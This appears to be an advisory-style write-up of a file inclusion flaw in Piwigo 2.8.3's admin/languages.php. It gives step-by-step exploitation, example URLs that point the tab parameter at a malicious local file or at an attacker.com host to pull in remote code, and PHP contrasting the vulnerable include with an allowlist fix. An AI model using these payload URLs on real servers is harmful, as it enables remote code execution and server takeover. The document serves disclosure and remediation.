admin/languages.php in Piwigo through 2.8.3 allows remote authenticated administrators to conduct File Inclusion attacks via the tab parameter.
Piwigo versions 2.8.3 and below are vulnerable to a critical File Inclusion vulnerability that allows authenticated administrators to execute arbitrary code. An attacker who supplies a malicious value for the tab parameter of admin/languages.php can thereby gain complete control of the web server.
Step 1: Authentication: The attacker must first authenticate as an administrator within the Piwigo instance. This requires valid administrator credentials.
Step 2: Payload Construction: The attacker crafts a malicious payload. This payload can be a local file (e.g., a file containing PHP code) or a remote file hosted on a server controlled by the attacker.
Step 3: Parameter Manipulation: The attacker crafts a URL that targets admin/languages.php and sets the tab parameter to the path of the malicious file. For example: admin/languages.php?tab=/path/to/malicious_file.php or admin/languages.php?tab=http://attacker.com/malicious.txt
Step 4: File Inclusion: The server, due to the vulnerability, includes the specified file using an include or require statement.
Step 5: Code Execution: If the included file contains valid PHP code, it is executed by the server, allowing the attacker to execute arbitrary commands and potentially gain full control of the server.
The vulnerability stems from missing input validation and sanitization of the tab parameter in the admin/languages.php script. The parameter selects which language-management file to include, and its value is passed directly to an include or require statement without filtering or whitelisting. An authenticated administrator can therefore make the server include a local or remote file of their choosing; if that file contains PHP code, it is executed, giving remote code execution (RCE). The root cause is the direct use of user-controlled input (tab) in an include or require statement.
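The following PHP is an added illustration of the root cause and its fix, not Piwigo's actual source: a simplified reconstruction of the unfiltered include beside an allowlist-based replacement. The tab names (installed, update, new), the file layout and the PHPWG_ROOT_PATH constant are assumptions for the example.

```php
<?php
// Illustrative example, not Piwigo's own code. Tab names and file paths
// below are assumed.
if (!defined('PHPWG_ROOT_PATH')) {
    define('PHPWG_ROOT_PATH', __DIR__ . '/../');
}

// VULNERABLE pattern: the request parameter reaches include() untouched.
// A local path, a traversal string or (with allow_url_include=On) a URL
// is included and, if it contains PHP, executed.
function render_tab_vulnerable(): void
{
    $tab = $_GET['tab'] ?? 'installed';
    include $tab;
}

// HARDENED pattern: a fixed map from tab name to file. The user's string
// is only used as a lookup key and never becomes part of a path, so
// traversal, absolute paths and remote URLs cannot reach include().
const LANGUAGE_TABS = [
    'installed' => 'admin/languages_installed.php',
    'update'    => 'admin/languages_update.php',
    'new'       => 'admin/languages_new.php',
];

function resolve_tab_file(string $tab): ?string
{
    // Exact, case-sensitive match against the allowlist; null otherwise.
    return LANGUAGE_TABS[$tab] ?? null;
}

function render_tab_hardened(): void
{
    $tab  = (string) ($_GET['tab'] ?? 'installed');
    $file = resolve_tab_file($tab);
    if ($file === null) {
        // Reject rather than guess; log the raw value for detection.
        error_log('languages.php: rejected tab value ' . var_export($tab, true));
        http_response_code(400);
        exit('Unknown tab');
    }
    include PHPWG_ROOT_PATH . $file;
}
```

Setting allow_url_include=Off in php.ini (its default) blocks the remote-file variant at the interpreter level, but it does not stop local file inclusion, so the allowlist is still the actual fix.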